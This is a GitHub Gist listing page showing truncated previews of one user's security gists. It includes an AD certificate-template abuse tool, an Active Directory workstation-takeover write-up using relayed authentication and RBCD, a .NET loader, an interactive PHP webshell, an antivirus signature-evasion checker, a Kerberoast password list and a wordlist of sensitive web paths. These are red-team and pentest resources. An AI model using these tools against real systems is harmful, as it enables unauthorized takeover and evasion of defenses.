@edermi
edermi / SharpApprover.cs
Created Sep 22, 2021 — forked from dmchell/SharpApprover.cs
Reset the mspki-enrollment-flag attribute when you possess a write ACE on a vulnerable certificate template
View SharpApprover.cs
using System;
using System.DirectoryServices;
namespace SharpApprover
{
class Program
{
public static void SetAdInfo(string objectFilter,
int objectValue, string LdapDomain)
@edermi
edermi / Workstation-Takeover.md
Created Sep 19, 2021 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
View Workstation-Takeover.md

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished, in short, by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@edermi
edermi / go-sharp-loader.go
Created Apr 4, 2021 — forked from ropnop/go-sharp-loader.go
Example Go file embedding multiple .NET executables
View go-sharp-loader.go
package main
/*
Example Go program with multiple .NET Binaries embedded
This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with:
$ go get -u github.com/gobuffalo/packr/packr
Place all your EXEs in a "binaries" folder
@edermi
edermi / shell.php
Created Dec 8, 2020 — forked from mrpapercut/shell.php
Interactive PHP webshell
View shell.php
<?php
function escapetext($text) {
return str_replace("\n", "<br>", htmlentities($text));
}
function exec_command($cmd, $internal = false) {
try {
$shell_exec = shell_exec($cmd);
} catch (Exception $e) {
View pydefendercheck.py
##################################################
## PyDefenderCheck - Python implementation of DefenderCheck
##################################################
## Author: daddycocoaman
## Based on: https://github.com/matterpreter/DefenderCheck
##################################################
import argparse
import enum
@edermi
edermi / xml2db.py
Created Feb 18, 2019
Quick and dirty python3 nmap/masscan xml to sqlite3 converter. Only converts address, port and if state is 'open' or not
View xml2db.py
#!/usr/bin/env python3
# For untrusted XML input, use a hardened parser, see https://docs.python.org/3/library/xml.html
import xml.etree.ElementTree as ET
import sqlite3
import argparse
import sys
@edermi
edermi / kerberoast_pws.xz
Last active Sep 10, 2020
edermi Kerberoast PW list (XZ format)
View kerberoast_pws.xz
@edermi
edermi / snallygaster.txt
Created Apr 26, 2018
snallygaster.txt - a wordlist to use with e.g. gobuster to query the same resources as @hannob's snallygaster
View snallygaster.txt
lfm.php
.idea/WebServers.xml
config/databases.yml
.git/config
.svn/entries
CVS/Root
server-status
core
sftp-config.json
WS_FTP.ini
@edermi
edermi / unbound.conf
Created Dec 23, 2017
My unbound config
View unbound.conf
server:
# log verbosity
verbosity: 1
use-syslog: yes
interface: 127.0.0.1
interface: ::1
do-ip6: yes
View keybase.md

Keybase proof

I hereby claim:

  • I am edermi on github.
  • I am edermi (https://keybase.io/edermi) on keybase.
  • I have a public key ASCW4hvy-ACn2JOQgRhz__YJFW6Y069muaOF5HF3GWeMEAo

To claim this, I am signing this object: